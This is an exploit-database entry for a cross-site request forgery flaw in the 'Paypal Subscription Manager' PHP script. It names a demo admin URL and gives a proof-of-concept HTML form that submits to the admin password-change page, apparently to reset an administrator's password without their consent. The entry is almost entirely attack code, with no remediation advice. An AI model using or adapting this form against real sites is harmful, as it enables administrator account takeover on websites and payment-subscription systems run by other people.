id: 17703
date: 03/14/2012
title: Paypal Subscription Manager CSRF Vulnerability
author: Jonturk75
cves: 

# Exploit Title: Paypal Subscription Manager CSRF
# Author: Jonturk75
# Vendor or Software Link: http://www.scripts.com/viewscript/paypal-subscription-manager/19026/
# Category::  webapps
# Demo : http://www.easebayresources.com/psm/admin/
# Greetz: Inj3ct0r Exploit DataBase 1337day.com


<form action="target.com/[PATH]/admin/changepwd.php" method="post">
<input type="hidden" size="30" style="border: 1px solid rgb(128, 128, 128); padding: 1px 4px; background-color: rgb(236, 234, 230);" name="password"/>
<input type="hidden" size="30" style="border: 1px solid rgb(128, 128, 128); padding: 1px 4px; background-color: rgb(236, 234, 230);" name="password1"/>
<input type="submit" value="Submit" name="submit"/>
</form>



#  0day.today [2023-03-23]  #